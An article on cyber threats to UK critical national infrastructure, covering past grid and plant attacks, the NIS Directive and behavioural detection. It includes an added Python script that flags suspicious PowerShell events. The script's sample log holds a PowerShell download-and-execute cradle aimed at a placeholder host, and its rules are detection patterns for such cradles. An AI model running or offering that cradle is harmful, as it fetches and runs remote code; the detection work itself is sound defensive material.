Sector - Software & Technology

Protecting the UK’s national infrastructure from cyber threats



The threat of a serious cyber security incident has become a major concern for most organisations after two years of an almost constant stream of high-profile attacks hitting household names. However, while these attacks are bad news for the affected companies and their customers, a much bigger threat comes in the form of attacks targeting critical national infrastructure, says Israel Barak at Cybereason.

The potential for a major attack on the UK infrastructure, such as the energy supply or the financial services sector, has grown significantly in recent times as both nation states and independent cybercriminals step up the volume and sophistication of their activity.

Indeed, in January, Ciaran Martin, Head of the National Cyber Security Centre (NCSC), warned in an interview that he believed it was a matter of “when, not if” for a “category one” attack, which would cripple key infrastructure. Martin added that he believed the UK would be lucky to make it out of the decade without at least one such incident.

Martin’s comments came after the NCSC announced in November 2017 that Russian hackers had orchestrated a number of attacks on UK targets, including the energy, media and telecoms sectors.

The UK has so far been fortunate to escape the wave of major attacks on national infrastructure that has swept the globe in recent years, with the energy sector as a major target.

The energy sector under attack

A watershed moment came in December 2015 when attackers hit Ukraine's power grid, the first known cyber attack to cause a power outage. The attackers used malware known as BlackEnergy to gain a foothold in the utilities' networks, then used the operators' own remote-access tools to open breakers at around 30 substations, leaving about 230,000 people without power for up to six hours. The attack took place during the Ukrainian-Russian conflict and is widely attributed to an advanced persistent threat group working on behalf of Russia.

In one of the most recent examples, a major oil and gas company in the Middle East was hit with malware called 'Trisis', also known as 'Triton'. The malware was purpose-built to tamper with Schneider Electric's Triconex safety instrumented system (SIS), the layer that brings a process to a safe stop when it leaves its safe operating limits. Subverting it lets an attacker force a plant shutdown or, by disabling the safety response, cause physical damage to a site. The incident was made more notable when Schneider Electric accidentally published crucial code from the malware on GitHub, potentially enabling criminals to replicate the attack.

Attacks on national infrastructure have become much easier to execute as the software and skills needed for high-level attacks become more readily available. BlackEnergy, Trisis, and other previous attacks such as the infamous Stuxnet worm, have all been tailored to attack specific systems by extremely skilled and knowledgeable hackers. However, the burgeoning cybercriminal economy on the darknet means that such tools, as well as the means to produce them, are increasingly widely available for purchase.

Advanced tools are becoming more available

A good example of this new paradigm came with last year's WannaCry and NotPetya attacks. Both spread using EternalBlue, an exploit for a vulnerability in Microsoft's SMBv1 file-sharing protocol (patched in March 2017 as MS17-010) that had been stolen from a cache of NSA tools and leaked online by the Shadow Brokers group. NotPetya, although dressed up as ransomware, offered no workable way to recover files and behaved in practice as a wiper.

The availability of high-grade malware and vulnerabilities means that attacks on national infrastructure are no longer limited to elite hackers with the resources of a nation state. Rather, any reasonably competent individual with a laptop can acquire the means to launch a devastating attack on the nation of their choice.

The good news is that attacks on infrastructure are much less enticing than ransomware campaigns or hacks targeting corporate and consumer data. Most criminals are motivated by personal gain and these kinds of attacks offer a clear payoff, whereas taking down a power grid or disabling a plant has no immediate monetary advantage. However, the fact remains that the potential is out there for any would-be terrorist or anarchist to take advantage of.

How can critical infrastructure be defended?

As with most other nations around the world, the UK has invested heavily in protecting the classified networks used by governmental departments, as well as other vital instruments of national security such as weapons systems.

However, when it comes to the critical national infrastructure, security is usually handled directly by individual private organisations. This means that poor practice by an organisation or even a single blind spot in security could lead to a cyber incident with a huge impact on the UK’s economy and the safety of its citizens.

To compensate for this security weakness, it is essential that the government takes a strong hand in regulating the security of all high priority targets such as energy, transport and finance.

Encouragingly, the government recently published new guidelines for companies to comply with the EU Network and Information Systems (NIS) Directive, which enters UK law in May 2018. Organisations deemed 'Operators of Essential Services', which includes most energy, water, transport and health providers, will need to meet the terms of the Directive when it comes into force. The government also announced fines of up to £17 million for firms found to have poor security practices, and regulators will be able to inspect companies to assess their cyber security readiness.

The NCSC's guidance for the NIS Directive sets out four top-level security objectives that organisations need to meet: managing security risk, protecting against cyber attack, detecting cyber security events, and minimising the impact of incidents. Each objective is broken down into principles and outcomes which, taken together, will greatly reduce the risk of a serious incident.

However, complete security assurance is impossible in the modern IT environment. There are thousands of innovative hackers constantly searching for vulnerabilities that can be exploited to launch an attack. Each of them only needs to be successful once, whereas the organisations in their crosshairs must defend themselves again and again. Indeed, even the NCSC’s Ciaran Martin admits that total protection is impossible, stating that some attacks will always get through, in which case cauterising the damage becomes the priority.

The importance of real time detection

One of the most valuable security capabilities for the organisations that form the UK’s critical national infrastructure is the ability to detect threats inside their network in real time. This will enable them to respond quickly and improves the chances of neutralising an attack before it can be escalated to exfiltrate critical data or damage essential operational systems.

An important part of real-time detection is moving from signature-based security to behavioural analysis. Most traditional security measures, such as firewalls and antivirus, work by identifying known quantities that indicate an attack, such as the hash or byte pattern of previously identified malware. A major shortcoming here is that the attack is likely to be fully under way by the time these signs are visible. Further, most advanced persistent threats (APTs) use previously unseen malware, or attack methods specifically designed not to trigger signature-based detection, such as abusing built-in administration tools like PowerShell so that no malicious file ever needs to touch the disk.

To counter these techniques, organisations need security measures that use behavioural analysis to spot suspicious activity across their IT network: an Office application spawning a command shell, a script pulling a payload from the internet, a command line deliberately obscured with encoding. Detecting these subtle signs in real time makes it possible to catch an attack before it reaches its objective.
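The following is an added example, not code from the article or from Cybereason, of what a behavioural rule set for PowerShell abuse looks like in practice. Instead of matching a hash or byte signature of known malware, it scores each process-creation event on the behaviours attackers rely on (a hidden window, an encoded payload, a download cradle, an Office application as the parent process), and it decodes any base64 payload and re-scans it so indicators hidden inside still count. The log format, hosts, users, URL, rule weights and alert threshold are all constructed assumptions for this example; the lines only mimic Windows 4688 or Sysmon process-creation records.

```python
"""Behaviour-based triage of PowerShell process-creation events (added example)."""
import base64
import binascii
import re

# Behavioural rules: (name, pattern, weight). Weights and threshold are illustrative
# assumptions, not tuned values. Each behaviour counts once per event.
RULES = [
    ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", re.I), 3),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), 2),
    ("bypass_policy", re.compile(r"-(?:ex|ep|executionpolicy)\s+bypass\b", re.I), 2),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I), 3),
    ("invoke_expression", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I), 2),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ALERT_THRESHOLD = 5

ENCODED_PAYLOAD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Split one constructed key=value record into a dict (quoted values keep spaces)."""
    return {key: value.strip('"') for key, value in FIELD.findall(line)}


def decode_payload(cmdline):
    """Return the text of a -EncodedCommand payload (base64 of UTF-16LE, as PowerShell
    requires); None if there is no payload, "" if one is present but cannot be decoded
    (a valid payload is never empty because the regex demands at least 8 characters)."""
    m = ENCODED_PAYLOAD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return ""


def score_event(event):
    """Score one parsed event; returns (score, sorted list of triggered behaviours)."""
    hits = {}
    cmdline = event.get("cmdline", "")
    texts = [cmdline]
    decoded = decode_payload(cmdline)
    if decoded == "":
        # Present but unreadable (malformed, or truncated by the collector): we cannot
        # see inside it, which is a reason to look harder, not to ignore it.
        hits["undecodable_payload"] = 2
    elif decoded is not None:
        texts.append(decoded)   # scan the decoded script with the same rules
    for text in texts:
        for name, pattern, weight in RULES:
            if pattern.search(text):
                hits[name] = weight
    if event.get("parent", "").lower() in OFFICE_PARENTS:
        hits["office_parent"] = 3   # Word/Excel launching a shell is the classic macro chain
    return sum(hits.values()), sorted(hits)


def triage(lines, threshold=ALERT_THRESHOLD):
    """Return an alert dict for every event whose behaviour score reaches the threshold."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        score, reasons = score_event(event)
        if score >= threshold:
            alerts.append({"host": event.get("host"), "parent": event.get("parent"),
                           "score": score, "reasons": reasons})
    return alerts


def _enc(script):
    """Encode a script the way -EncodedCommand expects (assumed helper for the samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample log: an admin one-liner, a macro-launched encoded download cradle,
# a scheduled backup script, a benign encoded command, and a payload the collector truncated.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_LOG = [
    r'2018-03-05T09:12:44Z host=WS-017 user=CORP\alice parent=explorer.exe image=powershell.exe '
    r'cmdline="powershell.exe -NoProfile -Command Get-Service"',
    '2018-03-05T09:13:02Z host=WS-017 user=CORP\\alice parent=WINWORD.EXE image=powershell.exe '
    'cmdline="powershell.exe -nop -w hidden -enc ' + _enc(CRADLE) + '"',
    r'2018-03-05T09:20:11Z host=SRV-03 user=CORP\svc_backup parent=svchost.exe image=powershell.exe '
    r'cmdline="powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"',
    '2018-03-05T09:21:30Z host=SRV-03 user=CORP\\svc_backup parent=svchost.exe image=powershell.exe '
    'cmdline="powershell.exe -EncodedCommand ' + _enc("Get-Date") + '"',
    '2018-03-05T09:25:09Z host=WS-022 user=CORP\\bob parent=explorer.exe image=powershell.exe '
    'cmdline="powershell.exe -enc ' + _enc(CRADLE)[:99] + '"',
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG):
        print(alert)
```

Run stand-alone, the script alerts on two of the five events: the Word-spawned encoded cradle (every rule fires once the payload is decoded) and the truncated payload, while the benign encoded `Get-Date` scores too low because decoding it reveals nothing suspicious. A hash of the downloaded `a.ps1` would never appear in these records at all, which is the point of scoring behaviour rather than bytes.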

By both taking on these more advanced measures and following the essential guidance set out by the NIS Directive, the private organisations responsible for the UK’s critical national infrastructure can ensure they are in the best possible position to prevent cyber-attacks from disrupting their essential services.


Article submitted by Israel Barak, CISO at Cybereason
